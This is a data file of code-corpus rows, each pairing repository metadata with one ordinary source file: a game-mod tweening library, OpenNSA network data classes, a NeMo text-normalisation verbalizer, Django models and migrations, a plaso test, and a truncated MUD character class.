804f8e56bedc2fc98d221bf2b9d493cdf526df9b | 5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5 | /tweens/__init__.py | 084009a757dab8cd2babe574c3a960dc078fa601 | [
"MIT"
] | permissive | juso40/bl2sdk_Mods | 8422a37ca9c2c2bbf231a2399cbcb84379b7e848 | 29f79c41cfb49ea5b1dd1bec559795727e868558 | refs/heads/master | 2023-08-15T02:28:38.142874 | 2023-07-22T21:48:01 | 2023-07-22T21:48:01 | 188,486,371 | 42 | 110 | MIT | 2022-11-20T09:47:56 | 2019-05-24T20:55:10 | Python | UTF-8 | Python | false | false | 1,512 | py | import unrealsdk # type: ignore
from Mods.ModMenu import Game, ModTypes, SDKMod
from .easing import (
back_in,
back_in_out,
back_out,
bounce_in,
bounce_in_out,
bounce_out,
circ_in,
circ_in_out,
circ_out,
cubic_in,
cubic_in_out,
cubic_out,
ease,
elastic_in,
elastic_in_out,
elastic_out,
expo_in,
expo_in_out,
expo_out,
linear,
quad_in,
quad_in_out,
quad_out,
quart_in,
quart_in_out,
quart_out,
quint_in,
quint_in_out,
quint_out,
sine_in,
sine_in_out,
sine_out,
)
from .tween import Tween
__all__ = [
"Tween",
"ease",
"linear",
"quad_in",
"quad_out",
"quad_in_out",
"cubic_in",
"cubic_out",
"cubic_in_out",
"quart_in",
"quart_out",
"quart_in_out",
"quint_in",
"quint_out",
"quint_in_out",
"sine_in",
"sine_out",
"sine_in_out",
"expo_in",
"expo_out",
"expo_in_out",
"circ_in",
"circ_out",
"circ_in_out",
"back_in",
"back_out",
"back_in_out",
"elastic_in",
"elastic_out",
"elastic_in_out",
"bounce_in",
"bounce_out",
"bounce_in_out",
]
class Tweens(SDKMod):
Name = "Tweens"
Version = "1.1"
Types = ModTypes.Library
Description = "A tweening library with various easing functions."
Author = "juso"
Status = "Enabled"
SettingsInputs = {}
SupportedGames = Game.BL2 | Game.TPS | Game.TPS
unrealsdk.RegisterMod(Tweens())
| [
"justin.sostmann@googlemail.com"
] | justin.sostmann@googlemail.com |
c18ae8bfe41026f2887bd16ea6477d010ae39f20 | e50ba4cc303d4165bef9e2917103c084cfbe0e07 | /virtual/bin/easy_install | 6b1f07b5d2a57699078d7cec02fd7d693960f2b8 | [
"MIT"
] | permissive | Antony-me/Ratemyapp | 09049fce54d3a3ed2b256970e7840d20942e8c84 | e547fea82439a3e4f83aa78bf16f93b1ea9ab00b | refs/heads/main | 2023-01-28T16:52:58.635646 | 2020-12-01T16:49:07 | 2020-12-01T16:49:07 | 316,425,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | #!/home/moringa/Documents/Moringa-Projects/CORE-PYTHON/Django/Ratemyapp/virtual/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # strip a trailing "-script.pyw"/".exe" suffix so argv[0] matches the tool name
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"antonymunyasia993@gmail.com"
] | antonymunyasia993@gmail.com | |
fc45af2bfbe4e881ea148db06b773b6a76638522 | ea3e6b14fa345772d930478007deab2b7c5d1c13 | /opennsa/nsa.py | 29387fb4577282590416bbc5d1293a57bf64d927 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | b0urn3/opennsa | d4d0ef81d4ab8a9656e4831b806a9852169c84bd | 6189d21e9ce8885f937607d5d745722593d27d20 | refs/heads/master | 2021-01-22T08:47:22.103847 | 2015-10-01T07:05:01 | 2015-10-01T07:05:01 | 45,279,581 | 0 | 0 | null | 2015-10-30T22:24:12 | 2015-10-30T22:24:12 | null | UTF-8 | Python | false | false | 12,461 | py | """
Core abstractions used in OpenNSA.
In design pattern terms, these would be Data Transfer Objects (DTOs).
Though some of them do actually have some functionality methods.
Author: Henrik Thostrup Jensen <htj@nordu.net>
Copyright: NORDUnet (2011-2013)
"""
import uuid
import random
import urlparse
import itertools
from opennsa import error, constants as cnt
LOG_SYSTEM = 'opennsa.nsa'

URN_UUID_PREFIX = 'urn:uuid:'

BIDIRECTIONAL = 'Bidirectional'


class NSIHeader(object):
    """NSI message header: requester/provider NSAs plus correlation and routing info."""

    def __init__(self, requester_nsa, provider_nsa, correlation_id=None, reply_to=None, security_attributes=None, connection_trace=None):
        self.requester_nsa = requester_nsa
        self.provider_nsa = provider_nsa
        # generate a correlation id when none (or an empty one) is supplied
        self.correlation_id = correlation_id if correlation_id else self._createCorrelationId()
        self.reply_to = reply_to
        self.security_attributes = security_attributes if security_attributes else []
        self.connection_trace = connection_trace

    def _createCorrelationId(self):
        return '%s%s' % (URN_UUID_PREFIX, uuid.uuid1())

    def newCorrelationId(self):
        """Replace the current correlation id with a freshly generated one."""
        self.correlation_id = self._createCorrelationId()

    def __repr__(self):
        fields = (self.requester_nsa, self.provider_nsa, self.correlation_id,
                  self.reply_to, self.security_attributes, self.connection_trace)
        return '<NSIHeader: %s, %s, %s, %s, %s, %s>' % fields
class SecurityAttribute(object):
    """A single typed authorization attribute."""
    # a better name would be AuthZAttribute, but we are keeping the NSI lingo

    def __init__(self, type_, value):
        assert type(type_) is str, 'SecurityAttribute type must be a string, not %s' % type(type_)
        assert type(value) is str, 'SecurityAttribute value must be a string, not %s' % type(value)
        self.type_ = type_
        self.value = value

    def match(self, sa):
        """True when both type and value are identical."""
        assert type(sa) is SecurityAttribute, 'Can only compare SecurityAttribute with another SecurityAttribute'
        return (self.type_, self.value) == (sa.type_, sa.value)

    def __repr__(self):
        return '<SecurityAttribute: %s = %s>' % (self.type_, self.value)
class EmptyLabelSet(Exception):
    """Raised when a label intersection produces no common values."""
    pass


class Label(object):
    """A technology label (e.g. a VLAN range) normalized to sorted, merged integer ranges.

    Values are stored as a list of inclusive (low, high) tuples, or None for an
    unlabelled Label.
    """

    def __init__(self, type_, values=None):
        # bug fix: the original assert tested "type(values) in (None, str, list)",
        # which can never match NoneType, so Label(type_) without values always raised
        assert values is None or type(values) in (str, list), 'Type of Label values must be a None, str, or list. Was given %s' % type(values)
        self.type_ = type_
        self.values = self._parseLabelValues(values) if values is not None else None

    def _parseLabelValues(self, values):
        """Parse '2,4-6'-style input into sorted, overlap-merged (low, high) tuples."""
        def createValue(value):
            try:
                if '-' in value:
                    v1, v2 = value.split('-', 1)
                    i1, i2 = int(v1), int(v2)
                    if i1 > i2:
                        raise error.PayloadError('Label value %s is in descending order, which is not allowed.' % value)
                else:
                    i1 = int(value)
                    i2 = i1
                return i1, i2
            except ValueError:
                raise error.PayloadError('Label %s is not an integer or an integer range.' % value)

        if type(values) is str:
            values = values.split(',')

        parsed_values = sorted( [ createValue(value) for value in values ] )

        # detect any overlap and remove it - remember that the list is sorted
        nv = [] # normalized values
        for v1, v2 in parsed_values:
            if len(nv) == 0:
                nv.append( (v1,v2) )
                continue
            l = nv[-1] # last
            if v1 <= l[1] + 1: # merge overlapping or adjacent ranges
                nv = nv[:-1] + [ (l[0], max(l[1],v2)) ]
            else:
                nv.append( (v1,v2) )

        return nv

    def intersect(self, other):
        """Return a new Label holding the values common to self and other.

        Raises EmptyLabelSet if there is no overlap.
        """
        assert type(other) is Label, 'Cannot intersect label with something that is not a label (other was %s)' % type(other)
        assert self.type_ == other.type_, 'Cannot insersect label of different types'

        label_values = []
        i = iter(other.values)
        # py3 compatibility fix: i.next() -> next(i) (also works on py2.6+)
        o1, o2 = next(i)
        for v1, v2 in self.values:
            while True:
                if v2 < o1:
                    break
                elif o2 < v1:
                    try:
                        o1, o2 = next(i)
                    except StopIteration:
                        break
                    continue
                label_values.append( ( max(v1,o1), min(v2,o2)) )
                if v2 <= o2:
                    break
                elif o2 <= v2:
                    try:
                        o1, o2 = next(i)
                    except StopIteration:
                        break

        if len(label_values) == 0:
            raise EmptyLabelSet('Label intersection produced empty label set')

        ls = ','.join( [ '%i-%s' % (nv[0], nv[1]) for nv in label_values ] )
        return Label(self.type_, ls)

    def labelValue(self):
        """Render the values as a compact string, e.g. '1-10,20'."""
        vs = [ str(v1) if v1 == v2 else str(v1) + '-' + str(v2) for v1,v2 in self.values ]
        return ','.join(vs)

    def singleValue(self):
        """True if the label holds exactly one integer value."""
        return len(self.values) == 1 and self.values[0][0] == self.values[0][1]

    def enumerateValues(self):
        """Expand the ranges into an explicit list of integers."""
        lv = [ range(lr[0], lr[1]+1) for lr in self.values ]
        return list(itertools.chain.from_iterable( lv ) )

    def randomLabel(self):
        # not evenly distributed, but that isn't promised anyway
        label_range = random.choice(self.values)
        # bug fix: randint is inclusive of both endpoints, so the original
        # "label_range[1]+1" could return a value just outside the range
        return random.randint(label_range[0], label_range[1])

    @staticmethod
    def canMatch(l1, l2):
        """True if both labels are None, or share type and at least one value."""
        if l1 is None and l2 is None:
            return True
        elif l1 is None or l2 is None:
            return False
        try:
            l1.intersect(l2) # this checks type as well as range
            return True
        except EmptyLabelSet:
            return False

    def __eq__(self, other):
        if not type(other) is Label:
            return False
        return self.type_ == other.type_ and sorted(self.values) == sorted(other.values)

    def __repr__(self):
        return '<Label %s:%s>' % (self.type_, self.labelValue())
class STP(object):
    """Service Termination Point: a (network, port) pair with an optional Label."""

    def __init__(self, network, port, label=None):
        assert type(network) is str, 'Invalid network type provided for STP'
        assert type(port) is str, 'Invalid port type provided for STP'
        assert label is None or type(label) is Label, 'Invalid label type provided for STP'
        self.network = network
        self.port = port
        self.label = label

    def shortName(self):
        """Human-readable name, e.g. 'net:port?vlan=1-10'."""
        name = '%s:%s' % (self.network, self.port)
        if self.label is None:
            return name
        return name + '?%s=%s' % (self.label.type_.split('#')[-1], self.label.labelValue())

    def baseURN(self):
        return '%s%s:%s' % (cnt.URN_OGF_PREFIX, self.network, self.port)

    def urn(self):
        """Full URN including the label query part, when present."""
        suffix = ''
        if self.label is not None:
            suffix = '?%s=%s' % (self.label.type_.split('#')[-1], self.label.labelValue())
        return self.baseURN() + suffix

    def __eq__(self, other):
        return type(other) is STP and \
            (self.network, self.port, self.label) == (other.network, other.port, other.label)

    def __repr__(self):
        return '<STP %s>' % self.shortName()
class Link(object):
    """A link between two STPs; labels must be either both set or both absent."""

    def __init__(self, src_stp, dst_stp):
        # both endpoints labelled, or neither
        if src_stp.label is None:
            assert dst_stp.label is None, 'Source and destination label must either both be None, or both specified'
        else:
            assert dst_stp.label is not None, 'Source and destination label must either both be None, or both specified'
        self.src_stp = src_stp
        self.dst_stp = dst_stp

    def sourceSTP(self):
        return self.src_stp

    def destSTP(self):
        return self.dst_stp

    def __eq__(self, other):
        return type(other) is Link and \
            (self.src_stp, self.dst_stp) == (other.src_stp, other.dst_stp)

    def __repr__(self):
        return '<Link %s == %s>' % (self.src_stp, self.dst_stp)
class Path(object):
    """
    An ordered sequence of links leading from a source STP to a destination STP.
    """

    def __init__(self, network_links):
        self.network_links = network_links

    def links(self):
        return self.network_links

    def sourceEndpoint(self):
        return self.network_links[0].sourceSTP()

    def destEndpoint(self):
        return self.network_links[-1].destSTP()

    def __str__(self):
        link_reprs = [ str(link) for link in self.network_links ]
        return '<Path: %s>' % ' '.join(link_reprs)
class NetworkServiceAgent(object):
    """Identity and endpoint of an NSA, optionally tagged with a service type."""

    def __init__(self, identity, endpoint, service_type=None):
        assert type(identity) is str, 'NSA identity type must be string (type: %s, value %s)' % (type(identity), identity)
        assert type(endpoint) is str, 'NSA endpoint type must be string (type: %s, value %s)' % (type(endpoint), endpoint)
        self.identity = identity
        self.endpoint = endpoint.strip()  # tolerate surrounding whitespace
        self.service_type = service_type

    def getHostPort(self):
        """Return (host, port) parsed from the endpoint URL."""
        parsed = urlparse.urlparse(self.endpoint)
        host, port = parsed.netloc.split(':', 2)
        return host, int(port)

    def urn(self):
        return '%s%s' % (cnt.URN_OGF_PREFIX, self.identity)

    def getServiceType(self):
        """Return the service type; raise if none was supplied at construction."""
        if self.service_type is None:
            raise ValueError('NSA with identity %s is not constructed with a type' % self.identity)
        return self.service_type

    def __str__(self):
        return '<NetworkServiceAgent %s>' % self.identity
class ConnectionInfo(object):
    # only used for query results
    """Container for one connection's query-result data.

    Plain data holder: validates that criterias is a list of QueryCriteria
    and stores all remaining fields verbatim.
    """
    def __init__(self, connection_id, global_reservation_id, description, service_type, criterias, provider_nsa, requester_nsa, states, notification_id, result_id):
        assert type(criterias) is list, 'Invalid criterias type: %s' % str(type(criterias))
        for criteria in criterias:
            assert type(criteria) is QueryCriteria, 'Invalid criteria type: %s' % str(type(criteria))
        self.connection_id = connection_id
        self.global_reservation_id = global_reservation_id
        self.description = description
        self.service_type = service_type
        self.criterias = criterias
        self.provider_nsa = provider_nsa
        self.requester_nsa = requester_nsa
        # NOTE(review): presumably a (reservation, provision, lifecycle) state
        # tuple plus dataplane status — confirm against the callers
        self.states = states
        self.notification_id = notification_id
        self.result_id = result_id
class Criteria(object):
    """Reservation criteria: revision number, schedule and service definition."""

    def __init__(self, revision, schedule, service_def):
        self.revision = revision
        self.schedule = schedule
        self.service_def = service_def


class QueryCriteria(Criteria):
    """Criteria variant carried in query summary/recursive results, with child connections."""

    def __init__(self, revision, schedule, service_def, children=None):
        assert children is None or type(children) is list, 'Invalid QueryCriteria type: %s' % str(type(children))
        for entry in children or []:
            assert type(entry) is ConnectionInfo, 'Invalid QueryCriteria child: %s' % str(type(entry))
        Criteria.__init__(self, revision, schedule, service_def)
        self.children = children or []
class Schedule(object):
    """A start/end time pair; datetimes must be naive (no tzinfo)."""

    def __init__(self, start_time, end_time):
        # Must be datetime instances without tzinfo (only checked when a
        # start time is supplied, matching the original contract)
        if start_time is not None:
            assert start_time.tzinfo is None, 'Start time must NOT have time zone'
            assert end_time.tzinfo is None, 'End time must NOT have time zone'
        self.start_time = start_time
        self.end_time = end_time

    def __str__(self):
        return '<Schedule: {}-{}>'.format(self.start_time, self.end_time)
class Point2PointService(object):
    """Service definition for a point-to-point connection between two STPs.

    Plain data holder; only directionality is validated (it must not be None,
    defaulting to the module-level BIDIRECTIONAL constant).
    """
    def __init__(self, source_stp, dest_stp, capacity, directionality=BIDIRECTIONAL, symmetric=None, ero=None, parameters=None):
        if directionality is None:
            raise error.MissingParameterError('directionality must be defined, must not be None')
        self.source_stp = source_stp
        self.dest_stp = dest_stp
        # NOTE(review): capacity is presumably in Mbps — confirm against callers
        self.capacity = capacity
        self.directionality = directionality
        self.symmetric = symmetric
        # ero: explicit route object (ordered intermediate hops), if any
        self.ero = ero
        self.parameters = parameters
| [
"htj@nordu.net"
] | htj@nordu.net |
eff42d766d3d17fe406f91087dcce5791135b309 | 2bf43e862b432d44ba545beea4e67e3e086c1a1c | /nemo_text_processing/inverse_text_normalization/de/verbalizers/decimal.py | ff3839533d7252c14f76c14c774dd3d78e9027a7 | [
"Apache-2.0"
] | permissive | ericharper/NeMo | 719e933f6ffce1b27358bc21efe87cdf144db875 | f1825bc4b724b78c2d6ca392b616e8dc9a8cde04 | refs/heads/master | 2022-10-06T01:45:21.887856 | 2022-09-14T19:09:42 | 2022-09-14T19:09:42 | 259,380,135 | 1 | 0 | Apache-2.0 | 2022-09-20T18:01:57 | 2020-04-27T15:54:20 | Python | UTF-8 | Python | false | false | 1,977 | py | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pynini
from nemo_text_processing.text_normalization.en.graph_utils import NEMO_NOT_QUOTE, GraphFst, delete_preserve_order
from pynini.lib import pynutil
class DecimalFst(GraphFst):
"""
Finite state transducer for verbalizing decimal, e.g.
decimal { negative: "true" integer_part: "12" fractional_part: "5006" quantity: "billion" } -> -12.5006 billion
Args:
tn_decimal_verbalizer: TN decimal verbalizer
"""
def __init__(self, tn_decimal_verbalizer: GraphFst, deterministic: bool = True):
super().__init__(name="decimal", kind="verbalize", deterministic=deterministic)
delete_space = pynutil.delete(" ")
optional_sign = pynini.closure(
pynutil.delete("negative: \"") + NEMO_NOT_QUOTE + pynutil.delete("\"") + delete_space, 0, 1
)
optional_integer = pynini.closure(tn_decimal_verbalizer.integer, 0, 1)
optional_fractional = pynini.closure(
delete_space + pynutil.insert(",") + tn_decimal_verbalizer.fractional_default, 0, 1
)
graph = (optional_integer + optional_fractional + tn_decimal_verbalizer.optional_quantity).optimize()
self.numbers = optional_sign + graph
graph = self.numbers + delete_preserve_order
delete_tokens = self.delete_tokens(graph)
self.fst = delete_tokens.optimize()
| [
"noreply@github.com"
] | ericharper.noreply@github.com |
11ba466d6dd826bfe33dce530a4def238f1d18da | e3ddee78a8f5fdc0260d6a5d8f3cbf459dd1aaa8 | /server/apps/places/serializers/ingredients.py | bb43262b935316b8fdb24505cd1d464f33fea434 | [] | no_license | AlAstroMoody/summer_practice | 91b6110f95436f2b91334a4d1626bf2f0a505a50 | 79629bcdcf230a395a53fad0b52e75ebd7385538 | refs/heads/master | 2023-01-15T19:32:22.814893 | 2020-11-23T10:17:46 | 2020-11-23T10:17:46 | 289,492,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | from rest_framework.serializers import ModelSerializer
from apps.places.models import Ingredient
class IngredientSerializer(ModelSerializer):
class Meta:
model = Ingredient
fields = ('id', 'name', 'calories')
| [
"aastrotenko@mail.ru"
] | aastrotenko@mail.ru |
176e6e7d4985abd3fc24bc06efd3afa99b86fb8c | 318a2283e9fd8386e1e9b8b33393ec21892ff053 | /tests/formatters/setupapi.py | c64b826daffd96f218ace0517a038c9f956f7480 | [
"Apache-2.0"
] | permissive | ddm1004/plaso | 3a4590f9c7fb5d624938dd1caea703dc92118646 | 88d44561754c5f981d4ab96d53186d1fc5f97f98 | refs/heads/master | 2021-05-19T10:16:24.111136 | 2020-02-27T04:40:48 | 2020-02-27T04:40:48 | 251,647,179 | 0 | 0 | Apache-2.0 | 2020-03-31T15:31:29 | 2020-03-31T15:31:29 | null | UTF-8 | Python | false | false | 918 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Windows Setupapi log event formatter."""
from __future__ import unicode_literals
import unittest
from plaso.formatters import setupapi
from tests.formatters import test_lib
class SetupapiLogFormatterTest(test_lib.EventFormatterTestCase):
"""Tests for the Windows Setupapi log event formatter."""
def testInitialization(self):
"""Tests the initialization."""
event_formatter = setupapi.SetupapiLogFormatter()
self.assertIsNotNone(event_formatter)
def testGetFormatStringAttributeNames(self):
"""Tests the GetFormatStringAttributeNames function."""
event_formatter = setupapi.SetupapiLogFormatter()
expected_attribute_names = [
'entry_type',
'exit_status']
self._TestGetFormatStringAttributeNames(
event_formatter, expected_attribute_names)
if __name__ == '__main__':
unittest.main()
| [
"joachim.metz@gmail.com"
] | joachim.metz@gmail.com |
d0df6dfa88db30e7f5491a7bae3c0a50bff9e42b | dd223d7f6c015c3484e795934bcce62be07e48e4 | /xkyy/apps/starry/migrations/0006_auto_20190524_2005.py | 1f06dadcbb386c125e90a590b9b97e6fa00801c3 | [] | no_license | hfxjd9527/xkyy | 84e696ba8c716dc7c0fb25bf71bb82f21ba314a6 | 61df8774dc63ec1b70cc6daad52da5aa51569076 | refs/heads/master | 2022-12-17T02:35:33.597919 | 2019-06-17T00:11:50 | 2019-06-17T00:11:50 | 190,134,676 | 0 | 0 | null | 2022-12-08T01:46:24 | 2019-06-04T05:22:34 | CSS | UTF-8 | Python | false | false | 985 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2019-05-24 20:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('starry', '0005_auto_20190524_1915'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'verbose_name': '文章', 'verbose_name_plural': '文章'},
),
migrations.AlterModelOptions(
name='category',
options={'verbose_name': '分类', 'verbose_name_plural': '分类'},
),
migrations.AddField(
model_name='article',
name='is_bigcategory',
field=models.BooleanField(default=True, verbose_name='是否大分类'),
),
migrations.AlterField(
model_name='category',
name='name',
field=models.CharField(max_length=20, verbose_name='分类'),
),
]
| [
"1725824530@qq.com"
] | 1725824530@qq.com |
c3fb12ce35d80f56662ff090d5961a5ed02cef2e | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/gstoption.py | f9d47d30fe88753af428273e2f8939186162e8b2 | [] | no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | # encoding: utf-8
# module gstoption
# from /usr/lib64/python2.6/site-packages/gstoption.so
# by generator 1.136
# no doc
# no imports
# functions
def get_group(*args, **kwargs): # real signature unknown
pass
# no classes
| [
"pkalita@princeton.edu"
] | pkalita@princeton.edu |
66a428a3081b0a3c9ee9125ce6ad9ae55668965e | 85d80b4aa95dcd87ea435d9a582aa74eec2fc67b | /muddery/typeclasses/characters.py | cffd791685749f260728af2af9b7a82598184cbd | [
"BSD-3-Clause"
] | permissive | emanonviroo/muddery | 1ddc4f18bda5faeec05329a61b5927d1465f73f2 | a102afdf8d41faf75bafc20ec36d74a48d6240e3 | refs/heads/master | 2021-07-14T00:36:05.566679 | 2017-10-16T12:40:45 | 2017-10-16T12:40:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,027 | py | """
Characters
Characters are (by default) Objects setup to be puppeted by Players.
They are what you "see" in game. The Character class in this module
is setup to be the "default" character type created by the default
creation commands.
"""
from __future__ import print_function
import ast
from twisted.internet import reactor
from twisted.internet.task import deferLater
from django.conf import settings
from evennia.objects.objects import DefaultCharacter
from evennia import create_script
from evennia.typeclasses.models import DbHolder
from evennia.utils import logger
from evennia.utils.utils import lazy_property
from muddery.typeclasses.objects import MudderyObject
from muddery.utils import utils
from muddery.utils.builder import build_object
from muddery.utils.skill_handler import SkillHandler
from muddery.utils.loot_handler import LootHandler
from muddery.worlddata.data_sets import DATA_SETS
from muddery.utils.builder import delete_object
from muddery.utils.attributes_info_handler import CHARACTER_ATTRIBUTES_INFO
from muddery.utils.localized_strings_handler import _
class MudderyCharacter(MudderyObject, DefaultCharacter):
"""
The Character defaults to implementing some of its hook methods with the
following standard functionality:
at_basetype_setup - always assigns the DefaultCmdSet to this object type
(important!)sets locks so character cannot be picked up
and its commands only be called by itself, not anyone else.
(to change things, use at_object_creation() instead)
at_after_move - launches the "look" command
at_post_puppet(player) - when Player disconnects from the Character, we
store the current location, so the "unconnected" character
object does not need to stay on grid but can be given a
None-location while offline.
at_pre_puppet - just before Player re-connects, retrieves the character's
old location and puts it back on the grid with a "charname
has connected" message echoed to the room
"""
# initialize skill handler in a lazy fashion
@lazy_property
def skill_handler(self):
return SkillHandler(self)
# initialize loot handler in a lazy fashion
@lazy_property
def loot_handler(self):
return LootHandler(self, DATA_SETS.character_loot_list.model)
def at_object_creation(self):
"""
Called once, when this object is first created. This is the
normal hook to overload for most object types.
"""
super(MudderyCharacter, self).at_object_creation()
# set default values
if not self.attributes.has("level"):
self.db.level = 1
if not self.attributes.has("exp"):
self.db.exp = 0
if not self.attributes.has("hp"):
self.db.hp = 1
if not self.attributes.has("mp"):
self.db.mp = 1
if not self.attributes.has("team"):
self.db.team = 0
# init equipments
if not self.attributes.has("equipments"):
self.db.equipments = {}
if not self.attributes.has("position_names"):
self.db.position_names = {}
self.reset_equip_positions()
if not self.attributes.has("skills"):
self.db.skills = {}
# set quests
if not self.attributes.has("completed_quests"):
self.db.completed_quests = set()
if not self.attributes.has("current_quests"):
self.db.current_quests = {}
self.target = None
self.reborn_time = 0
# A temporary character will be deleted after the combat finished.
self.is_temp = False
def after_data_loaded(self):
"""
Init the character.
"""
super(MudderyCharacter, self).after_data_loaded()
# clear target
self.target = None
# set reborn time
self.reborn_time = getattr(self.dfield, "reborn_time", 0)
# A temporary character will be deleted after the combat finished.
self.is_temp = False
# Character can auto fight.
self.auto_fight = False
# update equipment positions
self.reset_equip_positions()
# load default skills
self.load_default_skills()
# load default objects
self.load_default_objects()
# refresh data
self.refresh_data()
def after_data_key_changed(self):
"""
Called at data_key changed.
"""
super(MudderyCharacter, self).after_data_key_changed()
# reset hp
self.db.hp = self.max_hp
def reset_equip_positions(self):
"""
Reset equipment's position data.
Returns:
None
"""
positions = []
self.db.position_names = {}
# reset equipment's position
for record in DATA_SETS.equipment_positions.objects.all():
positions.append(record.key)
self.db.position_names[record.key] = record.name
for position in self.db.equipments:
if position not in positions:
del self.db.equipments[position]
for position in positions:
if position not in self.db.equipments:
self.db.equipments[position] = None
# reset equipments status
equipped = set()
equipments = self.db.equipments
for position in equipments:
if equipments[position]:
equipped.add(equipments[position])
for content in self.contents:
if content.dbref in equipped:
content.equipped = True
def set_level(self, level):
"""
Set character's level.
Args:
level: character's new level
Returns:
None
"""
if self.db.level == level:
return
self.db.level = level
self.refresh_data()
def refresh_data(self):
"""
Refresh character's data, calculate character's attributes.
"""
# load level data
self.load_model_data()
self.load_custom_attributes(CHARACTER_ATTRIBUTES_INFO)
# load equips
self.ues_equipments()
# load passive skills
self.cast_passive_skills()
def load_model_data(self):
"""
Load character's level data.
"""
model_name = getattr(self.dfield, "model", None)
if not model_name:
model_name = self.get_data_key()
try:
# get data from db
model_data = DATA_SETS.character_models.objects.get(key=model_name, level=self.db.level)
reserved_fields = {"id", "key", "name", "level"}
for field in model_data._meta.fields:
if field.name in reserved_fields:
continue
setattr(self.dfield, field.name, model_data.serializable_value(field.name))
except Exception, e:
logger.log_errmsg("Can't load character %s's level info (%s, %s): %s" %
(self.get_data_key(), model_name, self.db.level, e))
self.max_exp = getattr(self.dfield, "max_exp", 0)
self.max_hp = getattr(self.dfield, "max_hp", 1)
self.give_exp = getattr(self.dfield, "give_exp", 0)
def search_inventory(self, obj_key):
"""
Search specified object in the inventory.
"""
result = [item for item in self.contents if item.get_data_key() == obj_key]
return result
def set_equips(self):
"""
Load equipments data.
"""
# set equipments status
equipped = set()
equipments = self.db.equipments
for position in equipments:
if equipments[position]:
equipped.add(equipments[position])
for content in self.contents:
if content.dbref in equipped:
content.equipped = True
# set character's attributes
self.refresh_data()
def ues_equipments(self):
"""
Add equipment's attributes to the character
"""
# find equipments
equipped = set([equip_id for equip_id in self.db.equipments.values() if equip_id])
# add equipment's attributes
for content in self.contents:
if content.dbref in equipped:
content.equip_to(self)
def load_default_skills(self):
"""
Load character's default skills.
"""
# get character's model name
model_name = getattr(self.dfield, "model", None)
if not model_name:
model_name = self.get_data_key()
# default skills
skill_records = DATA_SETS.default_skills.objects.filter(character=model_name)
default_skill_ids = set([record.skill for record in skill_records])
# remove old default skills
for skill in self.db.skills:
skill_obj = self.db.skills[skill]
if skill_obj.is_default() and skill not in default_skill_ids:
# remove this skill
skill_obj.delete()
del self.db.skills[skill]
# add new default skills
for skill_record in skill_records:
if not self.skill_handler.has_skill(skill_record.skill):
self.skill_handler.learn_skill(skill_record.skill, True)
def cast_passive_skills(self):
"""
Add passive skills' effects to the character
"""
# cast passive skills
self.skill_handler.cast_passive_skills()
def load_default_objects(self):
"""
Load character's default objects.
"""
pass
def at_after_move(self, source_location):
"""
Called after move has completed, regardless of quiet mode or
not. Allows changes to the object due to the location it is
now in.
Args:
source_location : (Object) Where we came from. This may be `None`.
"""
pass
########################################
#
# Skill methods.
#
########################################
def learn_skill(self, skill_key):
"""
Check if the character has this skill.
Args:
skill_key: (string) skill's key
Returns:
(boolean) If the character learned this skill.
"""
return self.skill_handler.learn_skill(skill_key)
def has_skill(self, skill_key):
"""
Check if the character has this skill.
Args:
skill_key: (string) skill's key
Returns:
(boolean) if the character has this skill or not
"""
self.skill_handler.has_skill(skill_key)
def prepare_skill(self, skill_key, target):
"""
Prepare to cast a skill.
"""
if self.is_in_combat():
self.ndb.combat_handler.prepare_skill(skill_key, self, target)
else:
self.cast_skill(skill_key, target)
def cast_skill(self, skill_key, target):
"""
Cast a skill.
"""
self.skill_handler.cast_skill(skill_key, target)
def auto_cast_skill(self):
"""
Auto cast an available skill.
Put this method on the character because TICKER_HANDLER needs a typeclass.
Returns:
None
"""
self.skill_handler.auto_cast_skill()
def send_skill_result(self, result):
"""
Set the result of the skill. The character can send these messages to its surroundings.
Args:
result: (dict)the result of the skill
Returns:
None
"""
if result:
if self.ndb.combat_handler:
# send skill's result to the combat handler
self.ndb.combat_handler.send_skill_result(result)
elif self.location:
# send skill's result to caller's location
self.location.msg_contents({"skill_result": result})
########################################
#
# Attack a target.
#
########################################
def set_target(self, target):
"""
Set character's target.
Args:
target: (object) character's target
Returns:
None
"""
self.target = target
def clear_target(self):
"""
Clear character's target.
"""
self.target = None
def attack_target(self, target, desc=""):
"""
Attack a target.
Args:
target: (object) the target object.
desc: (string) string to describe this attack
Returns:
(boolean) attack begins
"""
if self.is_in_combat():
# already in battle
logger.log_errmsg("%s is already in battle." % self.dbref)
return False
# search target
if not target:
logger.log_errmsg("Can not find the target.")
return False
if not target.is_typeclass(settings.BASE_GENERAL_CHARACTER_TYPECLASS, exact=False):
# Target is not a character.
logger.log_errmsg("Can not attack the target %s." % target.dbref)
return False
if target.is_in_combat():
# obj is already in battle
logger.log_errmsg("%s is already in battle." % target.dbref)
return False
# create a new combat handler
chandler = create_script(settings.COMBAT_HANDLER)
# set combat team and desc
chandler.set_combat({1: [target], 2: [self]}, desc)
return True
